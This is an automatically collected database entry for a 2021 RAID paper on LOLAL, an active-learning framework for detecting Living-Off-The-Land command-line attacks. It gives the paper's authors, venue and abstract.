Living-Off-The-Land Command Detection Using Active Learning

TOP Literature Database Living-Off-The-Land Command Detection Using Active Learning

arxiv

AI Security Portal bot

Information in the literature database is collected automatically.

Source

https://arxiv.org/abs/2111.15039

PDF

https://arxiv.org/pdf/2111.15039

Paper Information

Author: Talha Ongun;Jack W. Stokes;Jonathan Bar Or;Ke Tian;Farid Tajaddodianfar;Joshua Neil;Christian Seifert;Alina Oprea;John C. Platt
Published: 11-30-2021
Affiliation: Northeastern University
Country: United States of America
Conference: International Symposium on Recent Advances in Intrusion Detection (RAID)

Labels Estimated by AI

Active Learning Backdoor Attack Malware Detection Method

These labels were automatically added by AI and may be inaccurate.
For details, see About Literature Database.

Abstract

In recent years, enterprises have been targeted by advanced adversaries who leverage creative ways to infiltrate their systems and move laterally to gain access to critical data. One increasingly common evasive method is to hide the malicious activity behind a benign program by using tools that are already installed on user computers. These programs are usually part of the operating system distribution or another user-installed binary, therefore this type of attack is called "Living-Off-The-Land". Detecting these attacks is challenging, as adversaries may not create malicious files on the victim computers and anti-virus scans fail to detect them. We propose the design of an Active Learning framework called LOLAL for detecting Living-Off-the-Land attacks that iteratively selects a set of uncertain and anomalous samples for labeling by a human analyst. LOLAL is specifically designed to work well when a limited number of labeled samples are available for training machine learning models to detect attacks. We investigate methods to represent command-line text using word-embedding techniques, and design ensemble boosting classifiers to distinguish malicious and benign samples based on the embedding representation. We leverage a large, anonymized dataset collected by an endpoint security product and demonstrate that our ensemble classifiers achieve an average F1 score of 0.96 at classifying different attack classes. We show that our active learning method consistently improves the classifier performance, as more training data is labeled, and converges in less than 30 iterations when starting with a small number of labeled instances.

External Datasets

process creation telemetry reports from Microsoft Defender for Endpoint

All Instances

Selected Samples

Labeled Samples